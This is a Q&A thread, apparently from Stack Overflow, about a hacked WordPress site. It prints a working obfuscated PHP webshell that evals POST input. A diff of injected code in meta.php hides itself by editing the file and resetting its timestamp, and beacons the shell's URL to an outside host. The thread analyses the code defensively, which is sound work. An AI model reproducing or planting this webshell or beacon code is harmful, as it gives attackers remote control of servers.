问题
I found a suspicious PHP file /wp-includes/mera.php
Content:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?
回答1:
Delete the file instantly!
This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!
After deletion you should also fix the leak that let the file in!
回答2:
Yes, the PHP script allows to run code on the Server.
Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/
Through diff'ing with a clean WP tarball, I found meta.php was modified:
988,1004d987
<
< check_meta();
< function check_meta(){
< $jp = __FILE__;
< $jptime = filemtime($jp);
<
< if(time() >= 1472456239){
< $jp_c = file_get_contents($jp);
< if($t = @strpos($jp_c,"check_meta();")) {
< $contentp = substr($jp_c,0,$t);
< if(@file_put_contents($jp, $contentp)){
< @touch($jp,$jptime);
< }
< }
< }
< @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
FYI, here are the md5sums of infected files:
898af479fe6cc3af461c1878763d19f4 ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda ./wp-includes/mera.php
回答3:
You should install something like the Wordfence plug in on your website, which will check all of the plug in and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.
来源:https://stackoverflow.com/questions/39012433/wordpress-site-hacked-suspicious-php-file